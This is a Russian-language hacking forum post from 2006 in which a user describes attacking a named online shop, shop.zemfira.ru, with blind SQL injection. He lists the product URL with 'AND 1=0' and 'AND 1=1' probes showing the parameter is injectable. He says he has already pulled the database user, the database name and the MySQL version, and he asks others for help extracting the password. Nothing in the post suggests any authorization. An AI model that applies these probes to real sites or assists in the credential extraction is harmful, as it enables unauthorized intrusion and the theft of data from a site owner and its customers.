Тема
:
Blind SQL Injection в магазине у Земфиры
Показать сообщение отдельно
Blind SQL Injection в магазине у Земфиры
#
1
23.03.2006, 00:05
Dmcox
Новичок
Регистрация: 18.12.2005
Сообщений: 11
Провел на форуме:
97865
Репутация:
11
Blind SQL Injection в магазине у Земфиры
Есть товар по ссылке
http://shop.zemfira.ru/?level=4&pid=18135540
Делаем запрос
http://shop.zemfira.ru/?level=4&pid=18135540
AND 1=0 (нет товара
)
Делаем опять запрос
http://shop.zemfira.ru/?level=4&pid=18135540
AND 1=1 (поевляется товар)
Так вот все бы хорошо юзера вытащил название базы тоже и версию MySQL, а вот пасс не как не хочет
Помогите заранее СПАСИБО
Dmcox
Посмотреть профиль
Репутация
Отправить личное сообщение для Dmcox
Посетить домашнюю страницу Dmcox
Найти все сообщения от Dmcox
Добавить в друзья
Blind SQL Injection в магазине у Земфиры
